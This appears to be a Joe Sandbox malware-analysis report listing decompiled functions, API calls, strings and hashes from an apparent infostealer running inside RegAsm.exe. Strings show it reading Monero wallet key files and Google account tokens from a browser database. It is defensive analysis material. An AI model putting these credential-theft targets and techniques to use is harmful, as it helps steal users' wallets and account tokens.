Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 73c223b449329a9ed3c0d770e8c375f8348c40775b1671b2e00414c08ca9d705
Instruction ID: b983745087c46d33ff3fcf2c4edf8d426f0c26ed647c8cf933829e7f4a2da3d7
Opcode Fuzzy Hash: 73c223b449329a9ed3c0d770e8c375f8348c40775b1671b2e00414c08ca9d705
Instruction Fuzzy Hash: A4B154B4A007469FE7109F34DD41F5B73E8AF40329F2C452CE98A8B281EB35E905C7A2

Function 19263D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 19263DC5
=%Q, xrefs: 19263E7F
%Q., xrefs: 19263E11

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: 57851f7673b0aaeb4f27e17c49ed047bf2e5ae744f6f5a3fb2fd2c074e491fe2
Instruction ID: 52e39fa5c5ce8d874eb575fafe69d3bf693046355324b0e0cb39f928a23c36c5
Opcode Fuzzy Hash: 57851f7673b0aaeb4f27e17c49ed047bf2e5ae744f6f5a3fb2fd2c074e491fe2
Instruction Fuzzy Hash: D7712371A043429BD700DF28DD80B5BB7E8BF44314F5C4629FC899B2A2D735E948CBA2

Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401C70
memset.MSVCRT ref: 00401C8E

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

lstrcat.KERNEL32(?,00000000), ref: 00401CB2
lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
lstrcat.KERNEL32(?,.keys), ref: 00401CDA

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

memset.MSVCRT ref: 00401E9D

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Strings

wallet_path, xrefs: 00401C93
\Monero\wallet.keys, xrefs: 00401D03
.keys, xrefs: 00401CCE
SOFTWARE\monero-project\monero-core, xrefs: 00401C98

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1518627966-218353709
Opcode ID: 0c9399beb639aea741c995be9c107405f967c2751d3dc8da5d9c0fe7073f1a13
Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
Opcode Fuzzy Hash: 0c9399beb639aea741c995be9c107405f967c2751d3dc8da5d9c0fe7073f1a13
Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69

Function 1924B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30dfd64dc3e6ec1ac88deaa4034035354304c7a67d830b58d9b9c9c32a4d2d7c
Instruction ID: 2c6762c66b60dd0a3e53efddce13f0373ce0087c73360736f7a572b5b73b48ec
Opcode Fuzzy Hash: 30dfd64dc3e6ec1ac88deaa4034035354304c7a67d830b58d9b9c9c32a4d2d7c
Instruction Fuzzy Hash: 758132B58083839BD7098F24CA8172EBBA0AF45200F7C497DECD51B296D735E996C792

Function 1928F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 98143eebddd894ce11477f68ab3c77c525bf8df51c5ae23d404837959afb3a9f
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: D751E6B6A043026FE700DE14DC81FAF77E8EF84714F58052DFA4597281E725AA59CBD2

Function 192B1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

block, xrefs: 192B1A90
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192B1B17
misuse, xrefs: 192B1B21
%s at line %d of [%.10s], xrefs: 192B1B26

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: 83e671e4a456b962a8f768123ec278ba267d3b9513a3de0f5582ac6e5da2fcc1
Instruction ID: fa63cf9388c2400ee573be6907326f6d2e6ac51271b132470ff540d766ef07f3
Opcode Fuzzy Hash: 83e671e4a456b962a8f768123ec278ba267d3b9513a3de0f5582ac6e5da2fcc1
Instruction Fuzzy Hash: 0DC1E4B19002969FDB10CF24CD84A5A77E4FF04395F2C8669FD4A9F242D731EA14CBA2

Function 00407EC7 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407ECC

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

lstrlenA.KERNEL32(00000000), ref: 004080EE

Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

StrStrA.SHLWAPI(00000000,AccountId), ref: 00408113
lstrlenA.KERNEL32(00000000), ref: 004081FD
lstrlenA.KERNEL32(00000000), ref: 00408211

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440

Strings

AccountId, xrefs: 0040810D
GoogleAccounts, xrefs: 00407EFD
GoogleAccounts, xrefs: 00407F80
SELECT service, encrypted_token FROM token_service, xrefs: 0040806A

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 832884763-1713091031
Opcode ID: 04c68c6b915c1709c3ac2a5ec28f97d08b59ab6b13c7c4767f1204634a09fa39
Instruction ID: 823a27315a2be3ebe0b3d1da1d3875886139d2c3e3f614190907fe3239292f81
Opcode Fuzzy Hash: 04c68c6b915c1709c3ac2a5ec28f97d08b59ab6b13c7c4767f1204634a09fa39
Instruction Fuzzy Hash: 77C13A71904248EADB15EBE5D956BDDBBB4AF18308F60407EE406B25C2DF782B0CDB25

Function 1925FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

%llu, xrefs: 1925FF3C
%llu, xrefs: 1925FFF7
no more rows available, xrefs: 1926006F
unknown error, xrefs: 1926003E
abort due to ROLLBACK, xrefs: 19260068
another row available, xrefs: 19260076, 19260081

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: 1f7c765d713b5baa95424ae7c804ef5796bb6a95a3e014c32d8b22fb8875816f
Instruction ID: 8b7f1e2a120c22c77bdbbc2f8e09d73f4bd72655f74041c75ed3ad0d44e1cdcd
Opcode Fuzzy Hash: 1f7c765d713b5baa95424ae7c804ef5796bb6a95a3e014c32d8b22fb8875816f
Instruction Fuzzy Hash: B89124306413019BD704CE19CC84B9A77F1FB85318F68466DFD4A977A1D33AE885CB92

Function 193670B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1936720D
API called with finalized prepared statement, xrefs: 19367201
misuse, xrefs: 19367217
%s at line %d of [%.10s], xrefs: 1936721C
orphan index, xrefs: 193672C2
invalid rootpage, xrefs: 1936715C, 1936730E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: ec2b4780ce66f8e5e3b9008cd2feacc26a1d37c4bdc0812e20d8124a2d4fc9db
Instruction ID: 1447d14976f9dff6b2b1fc9d426b919bdde962f5c9b3ec42f7d7ce833628c0e8
Opcode Fuzzy Hash: ec2b4780ce66f8e5e3b9008cd2feacc26a1d37c4bdc0812e20d8124a2d4fc9db
Instruction Fuzzy Hash: 66615A75A053806BE7228B30AC80B5777A89F41329F5C4669FC56961AAF331F354C7E2

Function 19253A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

cannot delete, xrefs: 19253A82
bad page value, xrefs: 19253BDC
no such schema, xrefs: 19253BEA
bad page number, xrefs: 19253BE3
cannot insert, xrefs: 19253BF1, 19253C52
read-only, xrefs: 19253A71

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 688e0bcc02f54f1c456d021a6be5be1a54e813826766ec8537ad7fff1124e335
Instruction ID: 128c1695bf69f2f50f4bbf5eff3f87b949f7b73e049d17bdbe7b96502150edb1
Opcode Fuzzy Hash: 688e0bcc02f54f1c456d021a6be5be1a54e813826766ec8537ad7fff1124e335
Instruction Fuzzy Hash: FA512275A04242DBFB04CF28C985B9A77E4AB40355F2C5469FC4BCB292E736E845C7A2

Function 1936B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1936B108
API call with %s database connection pointer, xrefs: 1936B0F9
NULL, xrefs: 1936B0F4
misuse, xrefs: 1936B112
%s at line %d of [%.10s], xrefs: 1936B117
invalid, xrefs: 1936B13E
unopened, xrefs: 1936B145

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: de486da712367d40edb9deee4ec60a29a2cbeedf92114112b3aa91d246e84c22
Instruction ID: 167766f374bf0d59ff982b895da47dab570c4fb3842cbdd7d6062a77218af0b8
Opcode Fuzzy Hash: de486da712367d40edb9deee4ec60a29a2cbeedf92114112b3aa91d246e84c22
Instruction Fuzzy Hash: 0131CE7550C384BBE7188B509C00A8B7BB99F45369F0C0728F9A563296E730E7058F93

Function 0040E204 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E209
lstrlenA.KERNEL32(?,6CDC7FA0,75AA5460,00000000), ref: 0040E22D
strchr.MSVCRT ref: 0040E23F
strchr.MSVCRT ref: 0040E263
lstrlenA.KERNEL32(?), ref: 0040E281
GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
HeapAlloc.KERNEL32(00000000), ref: 0040E295
strcpy_s.MSVCRT ref: 0040E2D0

Strings

0123456789ABCDEF, xrefs: 0040E217

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 1978830238-2554083253
Opcode ID: d06e3702c8d3da9ee1a5dc5dd05ac478fe31f46df90bac3dc58f48b3a5b04af6
Instruction ID: 22cfb6a18308d0bafb54031e8f985605d6d066b02289ec25e5459ee2ebffdd05
Opcode Fuzzy Hash: d06e3702c8d3da9ee1a5dc5dd05ac478fe31f46df90bac3dc58f48b3a5b04af6
Instruction Fuzzy Hash: B431C272A00115AFDB04EFAACC45AAF7BADEF49354B00447EF901EB2D1DA789905C764

Function 1928F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
